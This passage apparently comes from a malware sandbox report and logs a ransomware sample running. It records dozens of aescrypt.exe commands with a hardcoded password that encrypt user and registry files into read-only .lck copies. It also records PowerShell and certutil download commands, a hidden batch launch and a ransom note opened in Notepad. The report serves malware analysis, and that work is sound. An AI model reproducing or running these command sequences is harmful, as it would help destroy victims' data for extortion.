- - C:\Windows\system32\attrib.exe
    attrib +r "RegisterOptimize.mpeg.lck"
    3⤵
    PID:2212
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "SplitSelect.xltx.lck" "SplitSelect.xltx"
    3⤵
    - Executes dropped EXE
    PID:5092
- - C:\Windows\system32\attrib.exe
    attrib +r "SplitSelect.xltx.lck"
    3⤵
    - Views/modifies file attributes
    PID:3916
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ExitConvert.dll.lck" "ExitConvert.dll"
    3⤵
    - Executes dropped EXE
    PID:3920
- - C:\Windows\system32\attrib.exe
    attrib +r "ExitConvert.dll.lck"
    3⤵
    - Views/modifies file attributes
    PID:4252
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "GetSkip.mp2.lck" "GetSkip.mp2"
    3⤵
    - Executes dropped EXE
    PID:3288
- - C:\Windows\system32\attrib.exe
    attrib +r "GetSkip.mp2.lck"
    3⤵
    PID:284
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "UnblockConvertFrom.tmp.lck" "UnblockConvertFrom.tmp"
    3⤵
    - Executes dropped EXE
    PID:4288
- - C:\Windows\system32\attrib.exe
    attrib +r "UnblockConvertFrom.tmp.lck"
    3⤵
    - Views/modifies file attributes
    PID:4260
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "UninstallCompress.ADT.lck" "UninstallCompress.ADT"
    3⤵
    - Executes dropped EXE
    PID:3148
- - C:\Windows\system32\attrib.exe
    attrib +r "UninstallCompress.ADT.lck"
    3⤵
    PID:4068
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "SuspendSync.vstm.lck" "SuspendSync.vstm"
    3⤵
    - Executes dropped EXE
    PID:4072
- - C:\Windows\system32\attrib.exe
    attrib +r "SuspendSync.vstm.lck"
    3⤵
    PID:4060
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "SendReset.pdf.lck" "SendReset.pdf"
    3⤵
    - Executes dropped EXE
    PID:5008
- - C:\Windows\system32\attrib.exe
    attrib +r "SendReset.pdf.lck"
    3⤵
    PID:4444
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "DisconnectRemove.wmf.lck" "DisconnectRemove.wmf"
    3⤵
    - Executes dropped EXE
    PID:4528
- - C:\Windows\system32\attrib.exe
    attrib +r "DisconnectRemove.wmf.lck"
    3⤵
    PID:4504
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "RenameSync.emz.lck" "RenameSync.emz"
    3⤵
    - Executes dropped EXE
    PID:4584
- - C:\Windows\system32\attrib.exe
    attrib +r "RenameSync.emz.lck"
    3⤵
    - Views/modifies file attributes
    PID:4560
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "SuspendCheckpoint.midi.lck" "SuspendCheckpoint.midi"
    3⤵
    - Executes dropped EXE
    PID:4572
- - C:\Windows\system32\attrib.exe
    attrib +r "SuspendCheckpoint.midi.lck"
    3⤵
    PID:604
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "JoinCompress.css.lck" "JoinCompress.css"
    3⤵
    - Executes dropped EXE
    PID:4576
- - C:\Windows\system32\attrib.exe
    attrib +r "JoinCompress.css.lck"
    3⤵
    PID:632
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "SuspendGrant.dwfx.lck" "SuspendGrant.dwfx"
    3⤵
    - Executes dropped EXE
    PID:1524
- - C:\Windows\system32\attrib.exe
    attrib +r "SuspendGrant.dwfx.lck"
    3⤵
    - Views/modifies file attributes
    PID:1180
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "DisconnectGroup.csv.lck" "DisconnectGroup.csv"
    3⤵
    - Executes dropped EXE
    PID:1288
- - C:\Windows\system32\attrib.exe
    attrib +r "DisconnectGroup.csv.lck"
    3⤵
    PID:1520
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "RevokeFind.m1v.lck" "RevokeFind.m1v"
    3⤵
    - Executes dropped EXE
    PID:1772
- - C:\Windows\system32\attrib.exe
    attrib +r "RevokeFind.m1v.lck"
    3⤵
    - Views/modifies file attributes
    PID:4372
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ReadMove.wmf.lck" "ReadMove.wmf"
    3⤵
    - Executes dropped EXE
    PID:1816
- - C:\Windows\system32\attrib.exe
    attrib +r "ReadMove.wmf.lck"
    3⤵
    PID:1828
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "SetRestore.TTS.lck" "SetRestore.TTS"
    3⤵
    - Executes dropped EXE
    PID:2384
- - C:\Windows\system32\attrib.exe
    attrib +r "SetRestore.TTS.lck"
    3⤵
    PID:2564
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "RedoLock.ppsx.lck" "RedoLock.ppsx"
    3⤵
    - Executes dropped EXE
    PID:2604
- - C:\Windows\system32\attrib.exe
    attrib +r "RedoLock.ppsx.lck"
    3⤵
    PID:4744
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "RestartResume.M2V.lck" "RestartResume.M2V"
    3⤵
    - Executes dropped EXE
    PID:2596
- - C:\Windows\system32\attrib.exe
    attrib +r "RestartResume.M2V.lck"
    3⤵
    PID:4716
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ConfirmComplete.eps.lck" "ConfirmComplete.eps"
    3⤵
    - Executes dropped EXE
    PID:4708
- - C:\Windows\system32\attrib.exe
    attrib +r "ConfirmComplete.eps.lck"
    3⤵
    - Views/modifies file attributes
    PID:2496
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ConvertCompare.mpeg.lck" "ConvertCompare.mpeg"
    3⤵
    - Executes dropped EXE
    PID:4460
- - C:\Windows\system32\attrib.exe
    attrib +r "ConvertCompare.mpeg.lck"
    3⤵
    PID:3268
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ConfirmStep.lnk.lck" "ConfirmStep.lnk"
    3⤵
    - Executes dropped EXE
    PID:4628
- - C:\Windows\system32\attrib.exe
    attrib +r "ConfirmStep.lnk.lck"
    3⤵
    PID:4592
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "InvokeTest.lock.lck" "InvokeTest.lock"
    3⤵
    - Executes dropped EXE
    PID:764
- - C:\Windows\system32\attrib.exe
    attrib +r "InvokeTest.lock.lck"
    3⤵
    PID:752
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "RegisterAdd.iso.lck" "RegisterAdd.iso"
    3⤵
    - Executes dropped EXE
    PID:3960
- - C:\Windows\system32\attrib.exe
    attrib +r "RegisterAdd.iso.lck"
    3⤵
    - Views/modifies file attributes
    PID:3928
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "RepairPop.avi.lck" "RepairPop.avi"
    3⤵
    - Executes dropped EXE
    PID:3084
- - C:\Windows\system32\attrib.exe
    attrib +r "RepairPop.avi.lck"
    3⤵
    - Views/modifies file attributes
    PID:4700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
    3⤵
    PID:1376
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c (new-object System.Net.WebClient).DownloadFile('','')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4340
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c Invoke-WebRequest -Uri -OutFile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4048
- - C:\Windows\system32\certutil.exe
    certutil -urlcache -split -f
    3⤵
    PID:304
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe start-process -FilePath "C:\Windows\System32\cmd.exe" -ArgumentList "/k","call","C:\Users\Admin\Desktop\p2d.bat" -WorkingDirectory "C:\Users\Admin\Desktop" -WindowStyle hidden
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4260
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k call C:\Users\Admin\Desktop\p2d.bat
      4⤵
      Modifies registry class
      PID:3452
    - - C:\Windows\system32\NOTEPAD.EXE
        
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Pay2Decrypt1.txt
        5⤵
        Modifies registry class
        Opens file in notepad (likely ransom note)
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        
        PID:4720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:4464
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"
    3⤵
    - Executes dropped EXE
    PID:4520
- - C:\Windows\system32\attrib.exe
    attrib +r "ntuser.dat.LOG2.lck"
    3⤵
    - Views/modifies file attributes
    PID:4620
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ntuser.ini.lck" "ntuser.ini"
    3⤵
    - Executes dropped EXE
    PID:4484
- - C:\Windows\system32\attrib.exe
    attrib +r "ntuser.ini.lck"
    3⤵
    PID:4552
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf.lck" "NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf"
    3⤵
    - Executes dropped EXE
    PID:4632
- - C:\Windows\system32\attrib.exe
    attrib +r "NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf.lck"
    3⤵
    - Views/modifies file attributes
    PID:532
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ntuser.dat.LOG1.lck" "ntuser.dat.LOG1"
    3⤵
    - Executes dropped EXE
    PID:604
- - C:\Windows\system32\attrib.exe
    attrib +r "ntuser.dat.LOG1.lck"
    3⤵
    - Views/modifies file attributes
    PID:528
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms.lck" "NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms"
    3⤵
    - Executes dropped EXE
    PID:436
- - C:\Windows\system32\attrib.exe
    attrib +r "NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms.lck"
    3⤵
    - Views/modifies file attributes
    PID:1136
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms.lck" "NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms"
    3⤵
    - Executes dropped EXE
    PID:632
- - C:\Windows\system32\attrib.exe
    attrib +r "NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms.lck"
    3⤵
    - Views/modifies file attributes
    PID:1096
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "NTUSER.DAT.lck" "NTUSER.DAT"
    3⤵
    - Executes dropped EXE
    PID:1268
- - C:\Windows\system32\attrib.exe
    attrib +r "NTUSER.DAT.lck"
    3⤵
    PID:1388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /aD /b /oS
    3⤵
    PID:4664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:1784
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "90737d32e3aba4b.timestamp.lck" "90737d32e3aba4b.timestamp"
    3⤵
    - Executes dropped EXE
    PID:1676
- - C:\Windows\system32\attrib.exe
    attrib +r "90737d32e3aba4b.timestamp.lck"
    3⤵
    PID:1668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:8
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ntuser.dat.LOG2.lck" "ntuser.dat.LOG2"
    3⤵
    - Executes dropped EXE
    PID:2160
- - C:\Windows\system32\attrib.exe
    attrib +r "ntuser.dat.LOG2.lck"
    3⤵
    PID:2124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:1548
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "desktop.ini.lck" "desktop.ini"
    3⤵
    - Executes dropped EXE
    PID:2304
- - C:\Windows\system32\attrib.exe
    attrib +r "desktop.ini.lck"
    3⤵
    PID:2152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:2548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:2576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:2820
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "desktop.ini.lck" "desktop.ini"
    3⤵
    - Executes dropped EXE
    PID:2500
- - C:\Windows\system32\attrib.exe
    attrib +r "desktop.ini.lck"
    3⤵
    - Views/modifies file attributes
    PID:2692
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "These.docx.lck" "These.docx"
    3⤵
    - Executes dropped EXE
    PID:2856
- - C:\Windows\system32\attrib.exe
    attrib +r "These.docx.lck"
    3⤵
    - Views/modifies file attributes
    PID:4732
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "Are.docx.lck" "Are.docx"
    3⤵
    - Executes dropped EXE
    PID:4716
- - C:\Windows\system32\attrib.exe
    attrib +r "Are.docx.lck"
    3⤵
    PID:2932
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "Recently.docx.lck" "Recently.docx"
    3⤵
    - Executes dropped EXE
    PID:2588
- - C:\Windows\system32\attrib.exe
    attrib +r "Recently.docx.lck"
    3⤵
    - Views/modifies file attributes
    PID:200
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "Opened.docx.lck" "Opened.docx"
    3⤵
    - Executes dropped EXE
    PID:4412
- - C:\Windows\system32\attrib.exe
    attrib +r "Opened.docx.lck"
    3⤵
    - Views/modifies file attributes
    PID:3268
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "Files.docx.lck" "Files.docx"
    3⤵
    - Executes dropped EXE
    PID:1364
- - C:\Windows\system32\attrib.exe
    attrib +r "Files.docx.lck"
    3⤵
    PID:4456
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ShowInstall.vst.lck" "ShowInstall.vst"
    3⤵
    - Executes dropped EXE
    PID:804
- - C:\Windows\system32\attrib.exe
    attrib +r "ShowInstall.vst.lck"
    3⤵
    PID:752
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "RenameLock.potm.lck" "RenameLock.potm"
    3⤵
    - Executes dropped EXE
    PID:2296
- - C:\Windows\system32\attrib.exe
    attrib +r "RenameLock.potm.lck"
    3⤵
    PID:3952
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ConfirmClose.rtf.lck" "ConfirmClose.rtf"
    3⤵
    - Executes dropped EXE
    PID:4684
- - C:\Windows\system32\attrib.exe
    attrib +r "ConfirmClose.rtf.lck"
    3⤵
    PID:3392
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "SetExpand.vdw.lck" "SetExpand.vdw"
    3⤵
    - Executes dropped EXE
    PID:3664
- - C:\Windows\system32\attrib.exe
    attrib +r "SetExpand.vdw.lck"
    3⤵
    PID:3104
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "StartOpen.docx.lck" "StartOpen.docx"
    3⤵
    - Executes dropped EXE
    PID:4608
- - C:\Windows\system32\attrib.exe
    attrib +r "StartOpen.docx.lck"
    3⤵
    - Views/modifies file attributes
    PID:4928
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "LockBackup.xla.lck" "LockBackup.xla"
    3⤵
    - Executes dropped EXE
    PID:3116
- - C:\Windows\system32\attrib.exe
    attrib +r "LockBackup.xla.lck"
    3⤵
    PID:4376
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "AddPublish.xlsm.lck" "AddPublish.xlsm"
    3⤵
    - Executes dropped EXE
    PID:2220
- - C:\Windows\system32\attrib.exe
    attrib +r "AddPublish.xlsm.lck"
    3⤵
    - Views/modifies file attributes
    PID:4596
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "MountGrant.potm.lck" "MountGrant.potm"
    3⤵
    - Executes dropped EXE
    PID:2212
- - C:\Windows\system32\attrib.exe
    attrib +r "MountGrant.potm.lck"
    3⤵
    PID:4836
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ResizeSave.vstm.lck" "ResizeSave.vstm"
    3⤵
    - Executes dropped EXE
    PID:4796
- - C:\Windows\system32\attrib.exe
    attrib +r "ResizeSave.vstm.lck"
    3⤵
    PID:276
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ConfirmWait.pot.lck" "ConfirmWait.pot"
    3⤵
    - Executes dropped EXE
    PID:272
- - C:\Windows\system32\attrib.exe
    attrib +r "ConfirmWait.pot.lck"
    3⤵
    PID:4184
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "DisconnectOpen.mhtml.lck" "DisconnectOpen.mhtml"
    3⤵
    - Executes dropped EXE
    PID:3568
- - C:\Windows\system32\attrib.exe
    attrib +r "DisconnectOpen.mhtml.lck"
    3⤵
    - Views/modifies file attributes
    PID:3340
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "HideSelect.pot.lck" "HideSelect.pot"
    3⤵
    - Executes dropped EXE
    PID:280
- - C:\Windows\system32\attrib.exe
    attrib +r "HideSelect.pot.lck"
    3⤵
    - Views/modifies file attributes
    PID:3924
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "UnblockEnable.ppsx.lck" "UnblockEnable.ppsx"
    3⤵
    - Executes dropped EXE
    PID:4268
- - C:\Windows\system32\attrib.exe
    attrib +r "UnblockEnable.ppsx.lck"
    3⤵
    PID:3032
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "RepairImport.pot.lck" "RepairImport.pot"
    3⤵
    - Executes dropped EXE
    PID:3432
- - C:\Windows\system32\attrib.exe
    attrib +r "RepairImport.pot.lck"
    3⤵
    PID:3880
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "UnprotectLimit.mhtml.lck" "UnprotectLimit.mhtml"
    3⤵
    - Executes dropped EXE
    PID:4476
- - C:\Windows\system32\attrib.exe
    attrib +r "UnprotectLimit.mhtml.lck"
    3⤵
    - Views/modifies file attributes
    PID:1960
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "ConvertFromInitialize.vssm.lck" "ConvertFromInitialize.vssm"
    3⤵
    - Executes dropped EXE
    PID:4076
- - C:\Windows\system32\attrib.exe
    attrib +r "ConvertFromInitialize.vssm.lck"
    3⤵
    PID:3108
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "NewDeny.vdx.lck" "NewDeny.vdx"
    3⤵
    - Executes dropped EXE
    PID:3488
- - C:\Windows\system32\attrib.exe
    attrib +r "NewDeny.vdx.lck"
    3⤵
    PID:4432
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
    "C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe" -e -p mzzKTgkrJQfp0hEsODFQfKzKiFRvrOfu -o "SubmitSave.xps.lck" "SubmitSave.xps"
    3⤵
    - Executes dropped EXE
    PID:4464
- - C:\Windows\system32\attrib.exe
    attrib +r "SubmitSave.xps.lck"
    3⤵
    - Views/modifies file attributes
    PID:4524
- - C:\Users\Admin\AppData\Local\Temp\2754.tmp\aescrypt.exe
